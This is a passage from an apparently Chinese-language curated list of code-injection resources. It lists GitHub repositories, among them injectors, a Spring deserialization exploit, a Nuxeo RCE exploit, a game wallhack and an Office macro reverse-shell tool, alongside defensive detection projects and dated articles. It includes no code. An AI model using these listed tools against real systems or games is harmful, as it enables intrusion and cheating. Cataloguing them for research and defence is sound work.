ไธ€ไธชๅทฅๅ…ท๏ผŒไธ‹่ฝฝๅˆๆณ•็š„ๆ‰ฉๅฑ•Chrome็ฝ‘็ปœๅ•†ๅบ—ๅ’Œๆณจๅ…ฅไปฃ็ ็š„ๅบ”็”จ็จ‹ๅบ็š„่ƒŒๆ™ฏ - [**90**ๆ˜Ÿ][4y] [Java] [zerothoughts/spring-jndi](https://github.com/zerothoughts/spring-jndi) Proof of concept exploit, showing how to do bytecode injection through untrusted deserialization with Spring Framework 4.2.4 - [**66**ๆ˜Ÿ][2y] [Java] [sola-da/synode](https://github.com/sola-da/synode) Automatically Preventing Code Injection Attacks on Node.js - [**65**ๆ˜Ÿ][3y] [Py] [sethsec/pycodeinjection](https://github.com/sethsec/pycodeinjection) Automated Python Code Injection Tool - [**65**ๆ˜Ÿ][3m] [Py] [tbarabosch/quincy](https://github.com/tbarabosch/quincy) ๅœจๅ†…ๅญ˜่ฝฌๅ‚จไธญๆฃ€ๆต‹ๅŸบไบŽไธปๆœบ็š„ไปฃ็ ๆณจๅ…ฅๆ”ปๅ‡ป - [**49**ๆ˜Ÿ][2m] [C#] [guibacellar/dnci](https://github.com/guibacellar/dnci) DNCI - Dot Net Code Injector - [**48**ๆ˜Ÿ][3y] [C++] [tonyzesto/pubgprivxcode85](https://github.com/tonyzesto/pubgprivxcode85) ็ฎ€ๅ•chams wallhackไธบ็Žฉๅฎถๆœช็Ÿฅ็š„ๆˆ˜ๅœบไฝฟ็”จD3D11DrawIndexed้’ฉๅญๅŠŸ่ƒฝๅˆ—่กจ - [**47**ๆ˜Ÿ][1y] [C] [yifanlu/3ds_injector](https://github.com/yifanlu/3ds_injector) Open source implementation of loader module with code injection support - [**46**ๆ˜Ÿ][7m] [C] [rodionovd/task_vaccine](https://github.com/rodionovd/task_vaccine) Yet another code injection library for OS X - [**37**ๆ˜Ÿ][2m] [C] [sduverger/ld-shatner](https://github.com/sduverger/ld-shatner) ld-linux code injector - [**34**ๆ˜Ÿ][2y] [C++] [ntraiseharderror/dreadnought](https://github.com/ntraiseharderror/dreadnought) PoC for detecting and dumping code injection (built and extended on UnRunPE) - [**27**ๆ˜Ÿ][4y] [Java] [zerothoughts/jndipoc](https://github.com/zerothoughts/jndipoc) Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls - [**27**ๆ˜Ÿ][6m] [Java] [dinject/dinject](https://github.com/dinject/dinject) Dependency injection via APT (source code generation) ala "Server side Dagger DI" - [**25**ๆ˜Ÿ][7m] [Py] [batteryshark/miasma](https://github.com/batteryshark/miasma) Cross-Platform Binary OTF Patcher, Code Injector, Hacking Utility - [**25**ๆ˜Ÿ][3y] [C++] [hatriot/delayloadinject](https://github.com/hatriot/delayloadinject) Code injection via delay load libraries - [**20**ๆ˜Ÿ][2y] [c] [odzhan/propagate](https://github.com/odzhan/propagate) PROPagate code injection technique example - [**19**ๆ˜Ÿ][3y] [Swift] [depoon/injectiblelocationspoofing](https://github.com/depoon/injectiblelocationspoofing) Location Spoofing codes for iOS Apps via Code Injection - [**18**ๆ˜Ÿ][6y] [ObjC] [mhenr18/injector](https://github.com/mhenr18/injector) Code injection + payload communications for OSX (incl. sandboxed apps) - [**17**ๆ˜Ÿ][2m] [C++] [sunsided/native-dotnet-code-injection](https://github.com/sunsided/native-dotnet-code-injection) Injection of managed code into non-managed Windows applications - [**14**ๆ˜Ÿ][2m] [C#] [gerich-home/lua-inject](https://github.com/gerich-home/lua-inject) Inject any C# code into programs with lua - [**13**ๆ˜Ÿ][3y] [C] [tbarabosch/1001-injects](https://github.com/tbarabosch/1001-injects) Tiny research project to understand code injections on Linux based systems - [**13**ๆ˜Ÿ][3m] [C++] [revsic/codeinjection](https://github.com/revsic/codeinjection) Code Injection technique written in cpp language - [**11**ๆ˜Ÿ][2y] [C] [gdbinit/calcspace](https://github.com/gdbinit/calcspace) Small util to calculate available free space in mach-o binaries for code injection - [**11**ๆ˜Ÿ][7y] [C#] [yifanlu/vitainjector](https://github.com/yifanlu/vitainjector) Inject userland ARM code through PSM - [**9**ๆ˜Ÿ][19d] [Py] [bao7uo/waf-cookie-fetcher](https://github.com/bao7uo/waf-cookie-fetcher) ไธ€ไธช็”จPython็ผ–ๅ†™็š„Burpๅฅ—ไปถๆ‰ฉๅฑ•๏ผŒๅฎƒไฝฟ็”จไธ€ไธชๆ— ๅคดๆต่งˆๅ™จๆฅ่Žทๅ–ๆณจๅ…ฅๆ™ถๅœ†็š„cookie็š„ๅ€ผ๏ผŒ่ฟ™ไบ›cookieๆ˜ฏ้€š่ฟ‡ๅฎขๆˆท็ซฏJavaScriptไปฃ็ ๅœจๆต่งˆๅ™จไธญ่ฎก็ฎ—ๅ‡บๆฅ็š„๏ผŒๅนถๅฐ†ๅฎƒไปฌๆทปๅŠ ๅˆฐBurp็š„cookie jarไธญ - [**9**ๆ˜Ÿ][6m] [Py] [mpgn/cve-2018-16341](https://github.com/mpgn/cve-2018-16341) CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection - [**7**ๆ˜Ÿ][2y] [PHP] [jpapayan/aspis](https://github.com/jpapayan/aspis) A PHP code transformer to provide protection against injection attacks - [**6**ๆ˜Ÿ][2y] [Py] [andreafortuna/pycodeinjector](https://github.com/andreafortuna/pycodeinjector) Python code injection library - [**4**ๆ˜Ÿ][1y] [Java] [righettod/injection-cheat-sheets](https://github.com/righettod/injection-cheat-sheets) Provide some tips to handle Injection into application code (OWASP TOP 10 - A1). - [**2**ๆ˜Ÿ][2y] [Standard ML] [11digits/php-clean-malware](https://github.com/11digits/php-clean-malware) Simple PHP code to assist in cleaning of injected malware PHP code - [**2**ๆ˜Ÿ][9m] [C++] [thepwnrip/code-injection](https://github.com/thepwnrip/code-injection) A collection of methods of Code Injection on Windows - [**1**ๆ˜Ÿ][1y] [C++] [smore007/remote-iat-hook](https://github.com/smore007/remote-iat-hook) Remote IAT hook example. Useful for code injection - [**None**ๆ˜Ÿ][Py] [thelinuxchoice/eviloffice](https://github.com/thelinuxchoice/eviloffice) Inject Macro and DDE code into Excel and Word documents (reverse shell) *** ## <a id="5e603e03f62d50e6fa8310e15470f233"></a>ๆ–‡็ซ  - 2020.05 [hexacorn] [New Code Injection/Execution โ€“ Marshโ€ฆmellow](http://www.hexacorn.com/blog/2020/05/14/new-code-injection-execution-marsh-mellow/) - 2020.04 [hexacorn] [Code Injection everyone forgets about](http://www.hexacorn.com/blog/2020/04/09/code-injection-everyone-forgets-about/) - 2020.03 [WHIDInjector] [Remotely Injecting Keystrokes through an Industrial Barcode](https://www.youtube.com/watch?v=wJ1PFpHxA9Y) - 2020.01 [hakin9] [Memhunter - Live Hunting Of Code Injection Techniques](https://hakin9.org/memhunter-live-hunting-of-code-injection-techniques/) - 2020.01 [WarrantyVoider] [RE with WV - Episode #7 Binary Editing and Code Injection](https://www.youtube.com/watch?v=sRACOY3eRsU) - 2019.12 [HackersOnBoard] [DEF CON 27 - Alon Weinberg - Please Inject Me a x64 Code Injection](https://www.youtube.com/watch?v=CMq4NQ2snNs) - 2019.12 [sevagas] [Code Injection - Exploit WNF callback](https://blog.sevagas.com/?Code-Injection-Exploit-WNF-callback) - 2019.12 [sevagas] [Code Injection - Disable Dynamic Code Mitigation (ACG)](https://blog.sevagas.com/?Code-Injection-Disable-Dynamic-Code-Mitigation-ACG) - 2019.11 [ojasookert] [Macyโ€™s, Magecart, Black Friday, and JavaScript Code Injection](https://medium.com/p/3c54ac741b0f) - 2019.10 [talosintelligence] [YouPHPTube Encoder base64Url multiple command injections](https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917) - 2019.09 [netsparker] [What is Code Injection and How to Avoid It](https://www.netsparker.com/blog/web-security/code-injection/) - 2019.09 [aliyun] [ๅˆๆŽขไปฃ็ ๆณจๅ…ฅ](https://xz.aliyun.com/t/6253) - 2019.08 [bugbountywriteup] [When i found php code injection](https://medium.com/p/87e8e30afe59) - 2019.07 [bromium] [Dridexโ€™s Bag of Tricks: An Analysis of its Masquerading and Code Injection Techniques](https://www.bromium.com/dridex-threat-analysis-july-2019-variant/) - 2019.07 [aliyun] [Discuz!ML V3.X ไปฃ็ ๆณจๅ…ฅๅˆ†ๆž](https://xz.aliyun.com/t/5638) - 2019.06 [pewpewthespells] [Blocking Code Injection on iOS and OS X](https://pewpewthespells.com/blog/blocking_code_injection_on_ios_and_os_x.pdf) - 2019.05 [hexacorn] [โ€˜Plata o plomoโ€™ code injections/execution tricks](http://www.hexacorn.com/blog/2019/05/26/plata-o-plomo-code-injections-execution-tricks/) - 2019.05 [HackerSploit] [Bug Bounty Hunting - PHP Code Injection](https://www.youtube.com/watch?v=GE2HyC7Gwrs) - 2019.04 [hexacorn] [SHLoadInProc โ€“ The Non-Working Code Injection trick from the past](http://www.hexacorn.com/blog/2019/04/30/shloadinproc-the-non-working-code-injection-trick-from-the-past/) - 2019.04 [hexacorn] [Listplanting โ€“ yet another code injection trick](http://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/) - 2019.04 [hexacorn] [3 new code injection tricks](http://www.hexacorn.com/blog/2019/04/24/3-new-code-injection-tricks/) - 2019.04 [hexacorn] [Treepoline โ€“ new code injection technique](http://www.hexacorn.com/blog/2019/04/24/treepoline-new-code-injection-technique/) - 2019.04 [hexacorn] [WordWarper โ€“ new code injection trick](http://www.hexacorn.com/blog/2019/04/23/wordwarper-new-code-injection-trick/) - 2019.04 [JosephDelgadillo] [Learn System Hacking E6: PHP Code Injection](https://www.youtube.com/watch?v=paVE2Rx8mZI) - 2019.03 [freebuf] [Javaไปฃ็ ๅฎก่ฎกไน‹SpEL่กจ่พพๅผๆณจๅ…ฅ](https://www.freebuf.com/vuls/197008.html) - 2019.03 [aditya12anand] [How to write secure code against injection attacks?](https://medium.com/p/aad4fff058da) - 2019.03 [andreafortuna] [A simple Windows code Injection example written in C#](https://www.andreafortuna.org/programming/a-simple-windows-code-injection-example-written-in-c/) - 2018.12 [360] [Linux Userlandๅ†…ๅญ˜ไปฃ็ ๆณจๅ…ฅๅฎž่ทต](https://www.anquanke.com/post/id/168204/) - 2018.12 [aliyun] [HubLไธญ็š„ELๆณจๅ…ฅๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](https://xz.aliyun.com/t/3605) - 2018.11 [aliyun] [[็บขๆ—ฅๅฎ‰ๅ…จ]ไปฃ็ ๅฎก่ฎกDay17 - Raw MD5 Hashๅผ•ๅ‘็š„ๆณจๅ…ฅ](https://xz.aliyun.com/t/3375) - 2018.11 [freebuf] [clrinject๏ผšๅ‘CLR Runtimesๅ’ŒAppDomainไธญๆณจๅ…ฅไปฃ็ ็š„ๅทฅๅ…ท](https://www.freebuf.com/sectool/187541.html) - 2018.10 [MSbluehat] [BlueHat v18 || Memory resident implants - code injection is alive and well](https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well) - 2018.09 [ironcastle] [More Excel DDE Code Injection, (Fri, Sep 28th)](https://www.ironcastle.net/more-excel-dde-code-injection-fri-sep-28th/) - 2018.09 [sans] [More Excel DDE Code Injection](https://isc.sans.edu/forums/diary/More+Excel+DDE+Code+Injection/24150/) - 2018.09 [bugbountywriteup] [Injecting tourism website running codeigniter](https://medium.com/p/e3c5370236c2) - 2018.08 [andreafortuna] [pycodeinjector: a simple python Code Injection library](https://www.andreafortuna.org/programming/pycodeinjector-a-simple-python-code-injection-library/) - 2018.08 [trustedsec] [Breaking Down the PROPagate Code Injection Attack](https://www.trustedsec.com/2018/08/breaking-down-the-propagate-code-injection-attack/) - 2018.08 [andreafortuna] [Code injection on Windows using Python: a simple example](https://www.andreafortuna.org/programming/code-injection-on-windows-using-python-a-simple-example/) - 2018.07 [4hou] [Firefox้‡Œ็š„ๆœช็Ÿฅๆ‰ฉๅฑ•ๆญฃๅœจๅฐ†ไธ้œ€่ฆ็š„ไปฃ็ ๆณจๅ…ฅ็”จๆˆท่ฎฟ้—ฎ่ฟ‡็š„็ฝ‘็ซ™](http://www.4hou.com/vulnerable/12803.html) - 2018.07 [aliyun] [ๆœๅŠกๅ™จ็ซฏ็”ตๅญ่กจๆ ผๆณจๅ…ฅ - ไปŽๅ…ฌๅผๆณจๅ…ฅๅˆฐ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](https://xz.aliyun.com/t/2476) - 2018.06 [bishopfox] [ๆœๅŠกๅ™จ็ซฏSpreadsheetๆณจๅ…ฅ: ๅˆฉ็”จๅ…ฌๅผๆณจๅ…ฅๅฎž็ŽฐRCE](https://www.bishopfox.com/blog/2018/06/server-side-spreadsheet-injections/) - 2018.05 [freebuf] [้ป‘ๅฎขๅ…ฌๅธƒSignal้€š่ฎฏ่ฝฏไปถไธญ็š„ไปฃ็ ๆณจๅ…ฅๆ”ปๅ‡ป](http://www.freebuf.com/news/171824.html) - 2018.04 [freebuf] [PentesterLabๆ–ฐๆ‰‹ๆ•™็จ‹๏ผˆไธ€๏ผ‰๏ผšไปฃ็ ๆณจๅ…ฅ](http://www.freebuf.com/sectool/168653.html) - 2018.04 [4hou] [Early Birdไปฃ็ ๆณจๅ…ฅๅฏ็ป•่ฟ‡ๆ€ๆฏ’่ฝฏไปถๆฃ€ๆต‹](http://www.4hou.com/technology/11109.html) - 2018.04 [freebuf] [$_SERVER[SCRIPT_NAME]ๅ˜้‡ๅฏๅ€ผๆณจๅ…ฅๆถๆ„ไปฃ็ ](http://www.freebuf.com/articles/web/166263.html) - 2018.02 [360] [ไปŽๆฆ‚ๅฟตๅˆฐๅฎž้™…ๅบ”็”จ๏ผš่ฏฆ็ป†่ฎฒ่งฃ็”จๆˆท็บงAPI็›‘ๆŽงๅ’Œไปฃ็ ๆณจๅ…ฅๆฃ€ๆต‹ๆ–นๆณ•](https://www.anquanke.com/post/id/98770/) - 2018.01 [aliyun] [ๆŸ็”ตๅ•†ๅ‰ๅฐไปฃ็ ๆณจๅ…ฅ](https://xz.aliyun.com/t/1982) - 2018.01 [doyler] [Nodejs Code Injection (EverSec CTF โ€“ BSides Raleigh 2017)](https://www.doyler.net/security-not-included/nodejs-code-injection) - 2018.01 [4hou] [ๆ˜Ÿๅทดๅ…‹ๆŒ–็Ÿฟไบ‹ไปถๅˆ†ๆž๏ผš้ป‘ๅฎขๆ˜ฏๅฆ‚ไฝ•้ป‘ๆŽ‰WiFiๅนถๅฐ†ๆŒ–็Ÿฟไปฃ็ ๆณจๅ…ฅๅˆฐHTML้กต้ข็š„๏ผŸ](http://www.4hou.com/wireless/9773.html) - 2018.01 [4hou] [PoS็ซฏๆถๆ„่ฝฏไปถLockPoSๆบๆ–ฐๅž‹ไปฃ็ ๆณจๅ…ฅๆŠ€ๆœฏๅผบๅŠฟๅ›žๅฝ’](http://www.4hou.com/info/news/9774.html) - 2018.01 [oherrala] [Using static typing to protect against code injection attacks](https://medium.com/p/353002ca6f2b) - 2017.12 [4hou] [ไปฃ็ ๆณจๅ…ฅๆŠ€ๆœฏProcess Doppelgรคngingๅˆฉ็”จไป‹็ป](http://www.4hou.com/technology/9379.html) - 2017.12 [4hou] [ๆ–ฐๅž‹ไปฃ็ ๆณจๅ…ฅๆ”ปๅ‡ป๏ผˆProcess Doppelgรคnging๏ผ‰๏ผšๅฏ็ป•่ฟ‡ๅคงๅคšๆ•ฐAVๆฃ€ๆต‹](http://www.4hou.com/system/9183.html) - 2017.11 [4hou] [Wi-Fi็ฝ‘็ปœไธญ๏ผŒ็ฟป่ฝฌ็…ง็‰‡๏ผŒๆณจๅ…ฅๆถๆ„ไปฃ็ ๅˆฐๅฎขๆˆท็ซฏ](http://www.4hou.com/wireless/8559.html) - 2017.11 [freebuf] [PROPagate๏ผšไธ€็งๆ–ฐ็š„ไปฃ็ ๆณจๅ…ฅๆŠ€ๅทงไป‹็ป](http://www.freebuf.com/news/153041.html) - 2017.11 [l0wb1tUC] [COD WWII Code Injection Fail](https://www.youtube.com/watch?v=ngeCZu4g4vw) - 2017.11 [hexacorn] [PROPagate โ€“ a new code injection trick โ€“ 64-bit and 32-bit](http://www.hexacorn.com/blog/2017/11/03/propagate-a-new-code-injection-trick-64-bit-and-32-bit/) - 2017.10 [4hou] [PROPagateโ€”โ€”ไธ€็งๆ–ฐ็š„ไปฃ็ ๆณจๅ…ฅๆŠ€ๅทง](http://www.4hou.com/binary/8222.html) - 2017.10 [hexacorn] [ๆ–ฐ็š„ไปฃ็ ๆณจๅ…ฅๆŠ€ๅทง PROPagate](http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/) - 2017.09 [decktonic] [How one hacker stole thousands of dollars worth of cryptocurrency with a classic code injectionโ€ฆ](https://medium.com/p/a3aba5d2bff0) - 2017.09 [freebuf] [LANs.py๏ผšไธ€ๆฌพๅฏไปฅๅฎž็Žฐไปฃ็ ๆณจๅ…ฅ๏ผŒๆ— ็บฟๆธ—้€ๅ’ŒWiFi็”จๆˆท็›‘ๆŽง็š„ๅผบๅคงๅทฅๅ…ท](http://www.freebuf.com/sectool/147605.html) - 2017.09 [arxiv] [[1709.05690] BabelView: Evaluating the Impact of Code Injection Attacks in Mobile Webviews](https://arxiv.org/abs/1709.05690) - 2017.08 [defencely] [Achieving Code Injection on Trendy โ€“ Sarahah.com](https://defencely.com/blog/achieving-code-injection-on-trendy-sarahah-com/) - 2017.07 [bogner] [Code Injection in Slackโ€™s Windows Desktop Client leads to Privilege Escalation](https://bogner.sh/2017/07/code-injection-in-slacks-windows-desktop-client-leads-to-privilege-escalation/) - 2017.06 [trendmicro] [ๅ‹’็ดข่ฝฏไปถ SOREBRECT ๅˆ†ๆžใ€‚้‡‡็”จไบ†โ€œๆ— ๆ–‡ไปถโ€ใ€ๅˆฉ็”จ PsExec ๆณจๅ…ฅไปฃ็ ็ญ‰ๆŠ€ๆœฏ](https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-fileless-code-injecting-sorebrect-ransomware/) - 2017.04 [welivesecurity] [Fake Chrome extensions inject code into web pages](https://www.welivesecurity.com/2017/04/28/fake-chrome-extensions-inject-code-web-pages/) - 2017.04 [n0where] [Inject Custom Code Into PE File: InfectPE](https://n0where.net/inject-custom-code-into-pe-file-infectpe) - 2017.03 [mstajbakhsh] [Smali Code Injection: Playing with 2048!](https://mstajbakhsh.ir/smali-code-injection-playing-with-2048/) - 2017.03 [HackingMonks] [Remote Code Injection on DVWA medium](https://www.youtube.com/watch?v=eoZC5vsnTtw) - 2017.03 [360] [AtomBombing๏ผšWindows็š„ๅ…จๆ–ฐไปฃ็ ๆณจๅ…ฅๆŠ€ๆœฏ](https://www.anquanke.com/post/id/85675/) - 2017.02 [360] [ๅฆ‚ไฝ•ๅœจ.ipaๆ–‡ไปถไธŠ่ฟ›่กŒiOSไปฃ็ ๆณจๅ…ฅ](https://www.anquanke.com/post/id/85553/) - 2017.01 [securiteam] [SSD Advisory โ€“ Icewarp, AfterLogic and MailEnable Code Injection](https://blogs.securiteam.com/index.php/archives/2937) - 2017.01 [sentinelone] [What Is Code Injection?](https://www.sentinelone.com/blog/atombombing-code-injection-threat-hype/) - 2017.01 [csyssec] [ไบŒ่ฟ›ๅˆถไปฃ็ ๆณจๅ…ฅPIN](http://www.csyssec.org/20170104/pinintro/) - 2016.12 [mstajbakhsh] [Smali Code Injection](https://mstajbakhsh.ir/smali-code-injection/) - 2016.12 [tevora] [Gaining Code Execution with Injection on Java args](http://threat.tevora.com/quick-tip-gaining-code-execution-with-injection-on-java-args/) - 2016.11 [doyler] [Exploiting Python Code Injection in Web Applications](https://www.doyler.net/security-not-included/exploiting-python-code-injection) - 2016.11 [kennethpoon] [How to perform iOS Code Injection on .ipa files](https://medium.com/p/1ba91d9438db) - 2016.11 [thembits] [Loffice gets a makeover - Gives an insight into antis and detect code injection](http://thembits.blogspot.com/2016/11/loffice-gets-makeover-gives-insight.html) - 2016.11 [360] [ๅˆฉ็”จPythonไปฃ็ ๅฎž็ŽฐWebๅบ”็”จ็š„ๆณจๅ…ฅ](https://www.anquanke.com/post/id/84891/) - 2016.11 [sethsec] [Exploiting Python Code Injection in Web Applications](https://sethsec.blogspot.com/2016/11/exploiting-python-code-injection-in-web.html) - 2016.10 [360] [AtomBombing๏ผšๅ…จๆ–ฐ็š„Windowsไปฃ็ ๆณจๅ…ฅๆŠ€ๆœฏ](https://www.anquanke.com/post/id/84818/) - 2016.10 [ensilo] [AtomBombing: A Code Injection that Bypasses Current Security Solutions](https://blog.ensilo.com/atombombing-a-code-injection-that-bypasses-current-security-solutions) - 2016.10 [venus] [ไปฃ็ ๅฎก่ฎกๅฐฑ่ฏฅ่ฟ™ไนˆๆฅ - 2 Mlecms ๆณจๅ…ฅ](https://paper.seebug.org/78/) - 2016.10 [insinuator] [Linq Injection โ€“ From Attacking Filters to Code Execution](https://insinuator.net/2016/10/linq-injection-from-attacking-filters-to-code-execution/) - 2016.10 [polaris] [PHP Code Injection Analysis](http://polaris-lab.com/index.php/archives/254/) - 2016.10 [JackkTutorials] [How to perform Remote Code Injection attacks *REUPLOADED*](https://www.youtube.com/watch?v=AuNwk--lfxU) - 2016.09 [forcepoint] [Highly Evasive Code Injection Awaits User Interaction Before Delivering Malware](https://www.forcepoint.com/blog/security-labs/highly-evasive-code-injection-awaits-user-interaction-delivering-malware) - 2016.08 [artsploit] [[demo.paypal.com] Node.js code injection (RCE)](http://artsploit.blogspot.com/2016/08/pprce2.html) - 2016.07 [suchakra] [Unravelling Code Injection in Binaries](https://suchakra.wordpress.com/2016/07/03/unravelling-code-injection-in-binaries/) - 2016.03 [yifan] [3DS Code Injection through "Loader"](http://yifan.lu/2016/03/28/3ds-code-injection-through-loader/) - 2015.12 [hexacorn] [IME code injection (old)](http://www.hexacorn.com/blog/2015/12/17/ime-code-injection-old/) - 2015.08 [securiteam] [SSD Advisory โ€“ Symantec NetBackup OpsCenter Server Java Code Injection RCE](https://blogs.securiteam.com/index.php/archives/2557) - 2015.04 [sensecy] [MitM Attacks Pick Up Speed โ€“ A Russian Coder Launches a New Web Injection Codingย Service](https://blog.sensecy.com/2015/04/21/mitm-attacks-pick-up-speed-a-russian-coder-launches-a-new-web-injection-coding-service/) - 2015.03 [pediy] [[ๅŽŸๅˆ›]ไปฃ็ ๆณจๅ…ฅๅ™จๆบ็ ็ŒฎไธŠ](https://bbs.pediy.com/thread-198771.htm) - 2014.12 [] [้€ๆตชCMS2ไธชๆ–‡ไปถไธคไธชๆณจๅ…ฅ5ๅค„้—ฎ้ข˜ไปฃ็  ๅฆ้™„ๅ…ถไป–ๆณจๅ…ฅ็ป•่ฟ‡ๆ–นๅผ](http://0day5.com/archives/2627/) - 2014.11 [] [ไปฃ็ ๅฎก่ฎก๏ผšๅคง็ฑณCMSๆณจๅ…ฅ](http://www.91ri.org/11542.html) - 2014.10 [arxiv] [[1410.7756] Code Injection Attacks on HTML5-based Mobile Apps](https://arxiv.org/abs/1410.7756) - 2014.09 [tribalchicken] [Bash bug allows code injection attack](https://tribalchicken.io/bash-bug-allows-code-injection-attack/) - 2014.09 [digitaloperatives] [OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection: Local Use](https://www.digitaloperatives.com/2014/09/25/os-x-vmware-fusion-privilege-escalation-via-bash-environment-code-injection/) - 2014.09 [tribalchicken] [Bash bug allows code injection attack](https://tribalchicken.net/bash-bug-allows-code-injection-attack/) - 2014.08 [] [HTML5 App็š„ไปฃ็ ๆณจๅ…ฅๆ”ปๅ‡ป](http://www.91ri.org/10496.html) - 2014.03 [pediy] [[ๅŽŸๅˆ›]ๅฏน็ฌ”่ฎฐๆœฌ Inject code ๅฎž้ชŒ](https://bbs.pediy.com/thread-185635.htm) - 2014.01 [] [U-Mailๆณจๅ…ฅไน‹ไปปๆ„ไปฃ็ ๅ†™ๅ…ฅexp](http://0day5.com/archives/1210/) - 2013.12 [lowleveldesign] [Injecting code into .NETย applications](https://lowleveldesign.org/2013/12/28/injecting-code-into-net-applications/) - 2013.11 [imperva] [Threat Advisory: A JBoss AS Exploit, Web Shell code Injection.](https://www.imperva.com/blog/2013/11/threat-advisory-a-jboss-as-exploit-web-shell-code-injection/) - 2013.08 [scotthelme] [Code Injection - TLS (SSL) is not all about privacy, it's about integrity too](https://scotthelme.co.uk/ssl-about-integrity-too/) - 2013.08 [sans] [BBCode tag "[php]" used to inject php code](https://isc.sans.edu/forums/diary/BBCode+tag+php+used+to+inject+php+code/16291/) - 2013.05 [hackingarticles] [Exploit Remote PC using Firefox 17.0.1 + Flash Privileged Code Injection](http://www.hackingarticles.in/exploit-remote-pc-using-firefox-17-0-1-flash-privileged-code-injection/) - 2013.04 [freebuf] [[php ไปฃ็ ๅฎก่ฎก]Espcms ๆšดๅŠ›ๆณจๅ…ฅ](http://www.freebuf.com/vuls/8185.html) - 2013.03 [pediy] [[ๅŽŸๅˆ›]ๆ‰‹ๆœบๆฏ’้œธๅŽปๅนฟๅ‘ŠๅŠŸ่ƒฝๅˆ†ๆžไธ‰๏ผšjavaไปฃ็ ๏ผˆdex๏ผ‰ๆณจๅ…ฅ](https://bbs.pediy.com/thread-166480.htm) - 2012.12 [hackingarticles] [Bypassing Antivirus using Multi Pyinjector Shell Code Injection in SET Toolkit](http://www.hackingarticles.in/bypassing-antivirus-using-multi-pyinjector-shellcode-injection-in-set-toolkit/) - 2012.12 [freebuf] [ๅ‘ๆญฃๅœจ่ฟ่กŒ็š„Linuxๅบ”็”จ็จ‹ๅบๆณจๅ…ฅไปฃ็ ](http://www.freebuf.com/articles/system/6388.html) - 2012.11 [debasish] [Suicide via Remote Code Injection](http://www.debasish.in/2012/11/suicide-via-remote-code-injection.html) - 2012.10 [volatility] [Reverse Engineering Poison Ivy's Injected Code Fragments](https://volatility-labs.blogspot.com/2012/10/reverse-engineering-poison-ivys.html) - 2012.08 [cert] [More human than human โ€“ Flameโ€™s code injection techniques](https://www.cert.pl/en/news/single/more-human-than-human-flames-code-injection-techniques/) - 2012.07 [welivesecurity] [Rovnix.D: the code injection story](https://www.welivesecurity.com/2012/07/27/rovnix-d-the-code-injection-story/) - 2012.06 [welivesecurity] [ZeroAccess: code injection chronicles](https://www.welivesecurity.com/2012/06/25/zeroaccess-code-injection-chronicles/) - 2012.06 [freebuf] [[ๆ–นๆณ•ๅˆ†ไบซ]ๅˆฉ็”จ่พ“ๅ…ฅๆก†่ฟ›่กŒๆถๆ„ไปฃ็ ๆณจๅ…ฅ](http://www.freebuf.com/articles/4316.html) - 2012.06 [hackingarticles] [How to Attack on Remote PC using HTTP Code Injection Technique](http://www.hackingarticles.in/how-to-attack-on-remote-pc-using-http-code-injection-technique/) - 2012.04 [pediy] [[ๅŽŸๅˆ›]ไปŠๅคฉ็ช็„ถๆƒณๆณจๅ…ฅ๏ผŒๅ†™ไบ†็‚นไปฃ็ ](https://bbs.pediy.com/thread-148886.htm) - 2012.02 [trustwave] [[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment](https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--phpMyAdmin-Code-Injection-Attacks-for-Botnet-Recruitment/) - 2011.12 [pediy] [[ๅŽŸๅˆ›]่‡ชๅทฑๅ†™็š„ไธ€ไธชไธบๅฏๆ‰ง่กŒๆ–‡ไปถๆณจๅ…ฅไปฃ็ ็š„API๏ผŒไฝฟ็”จ่ถ…็บงๆ–นไพฟ](https://bbs.pediy.com/thread-143691.htm) - 2011.07 [pediy] [[ๅŽŸๅˆ›]ๅ€Ÿ่…นๆ€€่ƒŽ็š„ๆณจๅ…ฅไปฃ็ ไธชไบบ็†่งฃ](https://bbs.pediy.com/thread-137090.htm) - 2011.06 [forcepoint] [Malware campaign uses direct injection of Java exploit code](https://www.forcepoint.com/blog/security-labs/malware-campaign-uses-direct-injection-java-exploit-code) - 2010.05 [pediy] [[็ฟป่ฏ‘]ๆณจๅ…ฅไฝ ็š„ไปฃ็ ๅˆฐๅฏๆ‰ง่กŒๆ–‡ไปถ](https://bbs.pediy.com/thread-113871.htm) - 2009.03 [pediy] [[ๅŽŸๅˆ›]ๅฆ‚ไฝ•ๅ‘WM็จ‹ๅบๆณจๅ…ฅไปฃ็ [1]ๆ€ป็บฒ](https://bbs.pediy.com/thread-84327.htm) - 2009.01 [arxiv] [[0901.3482] Code injection attacks on harvard-architecture devices](https://arxiv.org/abs/0901.3482) - 2008.11 [travisgoodspeed] [MicaZ Code Injection](http://travisgoodspeed.blogspot.com/2008/11/micaz-code-injection.html) - 2008.09 [secshoggoth] [SEO Code Injection](http://secshoggoth.blogspot.com/2008/09/seo-code-injection.html) - 2008.07 [reverse] [Mac OS X Code injection](https://reverse.put.as/2008/07/03/mac-os-x-code-injection/) - 2007.09 [travisgoodspeed] [Memory-Constrained Code Injection](http://travisgoodspeed.blogspot.com/2007/09/memory-constrained-code-injection.html) - 2007.02 [sans] [more code injection sites 8.js](https://isc.sans.edu/forums/diary/more+code+injection+sites+8js/2178/) - 2006.12 [pediy] [[็ฟป่ฏ‘]ๆณจๅ…ฅ ๅŠจๆ€็”ŸๆˆๅŠๆททๆท†็š„ๆถๆ„ไปฃ็ ็š„ๆฃ€ๆต‹](https://bbs.pediy.com/thread-35766.htm) - 2006.08 [pediy] [[็ฟป่ฏ‘]ๅ‘ๅฏผๅ…ฅ่กจไธญๆณจๅ…ฅไปฃ็ ](https://bbs.pediy.com/thread-30166.htm) - 2006.04 [pediy] [็ฟป่ฏ‘๏ผšๅ‘PEไธญๆณจๅ…ฅไปฃ็ ๏ผˆ4.17ไฟฎๆ”น๏ผ‰](https://bbs.pediy.com/thread-24183.htm) - 2005.07 [pediy] [Code Injection็ ด่งฃArmadillo 